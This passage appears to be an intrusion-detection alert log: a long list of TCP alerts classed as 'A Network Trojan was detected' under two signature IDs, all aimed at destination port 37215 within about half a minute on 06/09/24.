          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929995
          SID:2829579
          Source Port:45602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818422
          SID:2829579
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226349
          SID:2829579
          Source Port:40400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166635
          SID:2829579
          Source Port:48000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081912
          SID:2835222
          Source Port:57016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684677
          SID:2829579
          Source Port:41124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995777
          SID:2829579
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644968
          SID:2829579
          Source Port:58134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993175
          SID:2835222
          Source Port:41844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161956
          SID:2835222
          Source Port:51590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244949
          SID:2829579
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821650
          SID:2835222
          Source Port:57402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224168
          SID:2835222
          Source Port:57998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472416
          SID:2835222
          Source Port:58784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948846
          SID:2829579
          Source Port:50546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900283
          SID:2835222
          Source Port:37574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312794
          SID:2829579
          Source Port:46112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644074
          SID:2835222
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917109
          SID:2829579
          Source Port:36518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478853
          SID:2835222
          Source Port:52664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644633
          SID:2829579
          Source Port:33454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414393
          SID:2835222
          Source Port:44604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168870
          SID:2835222
          Source Port:56636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.123247
          SID:2829579
          Source Port:42716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242697
          SID:2829579
          Source Port:56348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397941
          SID:2835222
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413091
          SID:2829579
          Source Port:49484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034619
          SID:2829579
          Source Port:45656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861267
          SID:2829579
          Source Port:44894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926809
          SID:2829579
          Source Port:33206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553739
          SID:2835222
          Source Port:53638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929307
          SID:2829579
          Source Port:59960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004655
          SID:2829579
          Source Port:57102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916593
          SID:2835222
          Source Port:50698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868891
          SID:2835222
          Source Port:47620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715018
          SID:2835222
          Source Port:55672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867176
          SID:2829579
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820138
          SID:2829579
          Source Port:53188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291703
          SID:2835222
          Source Port:50868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948989
          SID:2829579
          Source Port:33488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466929
          SID:2835222
          Source Port:36356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558179
          SID:2829579
          Source Port:59580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269991
          SID:2835222
          Source Port:51824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597992
          SID:2835222
          Source Port:56790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252930
          SID:2829579
          Source Port:33538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.949146
          SID:2829579
          Source Port:33080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993396
          SID:2835222
          Source Port:52770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724197
          SID:2829579
          Source Port:48096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241936
          SID:2829579
          Source Port:36526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413935
          SID:2835222
          Source Port:42348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129637
          SID:2829579
          Source Port:52680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004560
          SID:2835222
          Source Port:56448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242663
          SID:2829579
          Source Port:40710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538349
          SID:2835222
          Source Port:49846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945875
          SID:2829579
          Source Port:42364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000868
          SID:2835222
          Source Port:32804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000850
          SID:2835222
          Source Port:34648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273409
          SID:2835222
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281973
          SID:2835222
          Source Port:36418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988016
          SID:2829579
          Source Port:55576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720941
          SID:2835222
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167608
          SID:2829579
          Source Port:37930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003677
          SID:2835222
          Source Port:53904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129846
          SID:2835222
          Source Port:52628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130076
          SID:2829579
          Source Port:50506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397120
          SID:2835222
          Source Port:60086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993532
          SID:2829579
          Source Port:42598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074347
          SID:2835222
          Source Port:53564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720836
          SID:2835222
          Source Port:35274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989445
          SID:2829579
          Source Port:56844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162374
          SID:2835222
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253162
          SID:2835222
          Source Port:36754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644316
          SID:2829579
          Source Port:48636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552257
          SID:2829579
          Source Port:59302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870786
          SID:2829579
          Source Port:50140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863908
          SID:2835222
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719436
          SID:2829579
          Source Port:50784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224393
          SID:2829579
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282070
          SID:2835222
          Source Port:47364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860747
          SID:2835222
          Source Port:54650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418752
          SID:2829579
          Source Port:52184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301162
          SID:2835222
          Source Port:36240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540293
          SID:2835222
          Source Port:57832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867400
          SID:2835222
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164765
          SID:2829579
          Source Port:43768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990845
          SID:2835222
          Source Port:44108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036641
          SID:2829579
          Source Port:44364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471811
          SID:2829579
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946380
          SID:2829579
          Source Port:57486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930114
          SID:2829579
          Source Port:42174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861109
          SID:2829579
          Source Port:43636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028986
          SID:2835222
          Source Port:37246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290123
          SID:2835222
          Source Port:51806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252376
          SID:2829579
          Source Port:43116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244877
          SID:2835222
          Source Port:54906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598257
          SID:2835222
          Source Port:43780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081954
          SID:2835222
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986725
          SID:2835222
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.077223
          SID:2835222
          Source Port:35434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397540
          SID:2829579
          Source Port:42736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465529
          SID:2835222
          Source Port:50886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718448
          SID:2829579
          Source Port:36800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245520
          SID:2829579
          Source Port:60508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033845
          SID:2835222
          Source Port:35062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926165
          SID:2835222
          Source Port:51860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396323
          SID:2835222
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291590
          SID:2835222
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224794
          SID:2829579
          Source Port:34872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719853
          SID:2829579
          Source Port:50218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032527
          SID:2829579
          Source Port:52586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478617
          SID:2835222
          Source Port:59326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820547
          SID:2835222
          Source Port:47902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472217
          SID:2835222
          Source Port:35986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904427
          SID:2835222
          Source Port:47212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537988
          SID:2835222
          Source Port:58338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538162
          SID:2835222
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916684
          SID:2829579
          Source Port:60408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206436
          SID:2835222
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643375
          SID:2835222
          Source Port:35802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684661
          SID:2829579
          Source Port:55334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599852
          SID:2835222
          Source Port:49896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925362
          SID:2829579
          Source Port:37112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168841
          SID:2829579
          Source Port:43998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398942
          SID:2829579
          Source Port:56550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601840
          SID:2829579
          Source Port:58880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950986
          SID:2829579
          Source Port:42700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645882
          SID:2829579
          Source Port:35850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926105
          SID:2835222
          Source Port:44156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164452
          SID:2829579
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399361
          SID:2835222
          Source Port:59638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471997
          SID:2835222
          Source Port:51512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242752
          SID:2835222
          Source Port:41682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131932
          SID:2829579
          Source Port:53866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398406
          SID:2829579
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418941
          SID:2835222
          Source Port:55330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.271282
          SID:2829579
          Source Port:56906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246531
          SID:2829579
          Source Port:39136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818359
          SID:2829579
          Source Port:52814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677163
          SID:2829579
          Source Port:50376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947212
          SID:2829579
          Source Port:50638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286566
          SID:2835222
          Source Port:58632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286725
          SID:2829579
          Source Port:39822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103919
          SID:2829579
          Source Port:48220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867027
          SID:2829579
          Source Port:42440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.996224
          SID:2835222
          Source Port:56530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036077
          SID:2835222
          Source Port:45566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162001
          SID:2829579
          Source Port:59140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249363
          SID:2835222
          Source Port:33396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038419
          SID:2835222
          Source Port:54782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645100
          SID:2835222
          Source Port:54932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244905
          SID:2835222
          Source Port:39390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921920
          SID:2829579
          Source Port:39978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162985
          SID:2835222
          Source Port:52980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642823
          SID:2829579
          Source Port:35374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131582
          SID:2835222
          Source Port:33000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104085
          SID:2829579
          Source Port:39954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475947
          SID:2829579
          Source Port:42262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904324
          SID:2835222
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646014
          SID:2835222
          Source Port:40300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696443
          SID:2835222
          Source Port:39560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945811
          SID:2835222
          Source Port:57378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162567
          SID:2835222
          Source Port:55068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922274
          SID:2829579
          Source Port:38096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160429
          SID:2829579
          Source Port:55106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566408
          SID:2829579
          Source Port:53184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987124
          SID:2829579
          Source Port:40362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600967
          SID:2829579
          Source Port:50386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915649
          SID:2835222
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289113
          SID:2829579
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538373
          SID:2829579
          Source Port:53442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272259
          SID:2829579
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926337
          SID:2829579
          Source Port:54182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720868
          SID:2829579
          Source Port:33030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157041
          SID:2835222
          Source Port:34668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246104
          SID:2835222
          Source Port:35284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466657
          SID:2829579
          Source Port:51528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080720
          SID:2835222
          Source Port:46874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396116
          SID:2835222
          Source Port:46258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945279
          SID:2835222
          Source Port:53948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593614
          SID:2835222
          Source Port:51114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399851
          SID:2835222
          Source Port:33440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079291
          SID:2829579
          Source Port:57402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951606
          SID:2829579
          Source Port:50982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.956196
          SID:2835222
          Source Port:42376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538026
          SID:2835222
          Source Port:58830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475749
          SID:2829579
          Source Port:45244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867658
          SID:2829579
          Source Port:52812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033108
          SID:2835222
          Source Port:54546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230895
          SID:2829579
          Source Port:36852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.039603
          SID:2829579
          Source Port:55492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993319
          SID:2835222
          Source Port:60756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162641
          SID:2835222
          Source Port:54484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104287
          SID:2835222
          Source Port:51496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558050
          SID:2835222
          Source Port:56562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227657
          SID:2829579
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.723949
          SID:2829579
          Source Port:36510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288204
          SID:2835222
          Source Port:44174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
